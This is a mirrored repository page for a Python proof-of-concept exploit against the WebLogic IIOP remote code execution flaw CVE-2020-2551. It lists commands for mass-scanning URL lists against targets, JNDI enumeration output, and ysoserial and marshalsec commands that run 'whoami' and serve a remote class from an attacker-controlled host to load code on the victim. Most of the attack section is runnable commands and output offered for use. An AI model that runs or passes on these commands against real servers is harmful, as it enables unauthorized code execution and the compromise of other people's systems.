Giter Site home page Giter Site logo

crackercat / cve-2020-2552 Goto Github PK

View Code? Open in Web Editor NEW

This project forked from hktalent/cve-2020-2551

0.0 0.0 0.0 50 KB

CVE-2020-2551 poc exploit python Weblogic RCE with IIOP, power by 【劦久信安】 online check:

Home Page: https://51pwn.com

Python 100.00%

cve-2020-2552's Introduction

Twitter: @Hktalent3135773 Tweet Follow on Twitter

0、how get pro exploit tools?

see hktalent#5

1、CVE-2020-2551

CVE-2020-2551 poc exploit python example keys: GIOP corba image

How use

python3 CVE-2020-2551.py -u http://192.168.26.79:7001
cat urls.txt|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
cat xxx.html|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
# 32 Thread check
cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e
# now result to data/*.txt
java -cp hktalent_51pwn_com_12.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
java -cp hktalent_51pwn_com_12.2.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port

t3, t3s, http, https, iiop, iiops

service:jmx:rmi://ip:port/jndi/iiop://ip:port/MBean-server-JNDI-name
service:jmx:iiop://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
service:jmx:t3://ip:port/jndi/weblogic.management.mbeanservers.domainruntime

poc

image

2、your know your do

{
    "ejb": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "interfaces": [
            "javax.naming.Context"
        ],
        "mgmt": {
            "MEJB": {
                "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
                "interfaces": []
            },
            "class": "com.sun.jndi.cosnaming.CNCtx",
            "interfaces": [
                "javax.naming.Context"
            ]
        }
    },
    "javax": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No",
        "interfaces": [
            "javax.naming.Context"
        ]
    },
    "jdbc": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "db_xf": {
            "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
            "interfaces": []
        },
        "interfaces": [
            "javax.naming.Context"
        ]
    },
    "mejbmejb_jarMejb_EO": {
        "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
        "interfaces": []
    },
    "weblogic": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No",
        "interfaces": [
            "javax.naming.Context"
        ]
    }
}

3、ejb

/bea_wls_internal/classes/mejb@/

weblogic.management.j2ee.mejb.Mejb_dj*#remove(Object obj)

4、jta

x.lookup("ejb/mgmt/MEJB").remove(jta);

5、logs

  • fix rmi use Jdk7u21 payload,not work for remote jdk8 don‘t use
java -cp $mtx/../tools/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 'whoami'

use,XXclass.class from jdk6 build

java -cp $mtx/../tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer 'http://YourIP:port/#XXclass' 1099

6、thanks for

@r4v3zn @0nise Top Langs

cve-2020-2552's People

Contributors

hktalent avatar pwnedanything avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.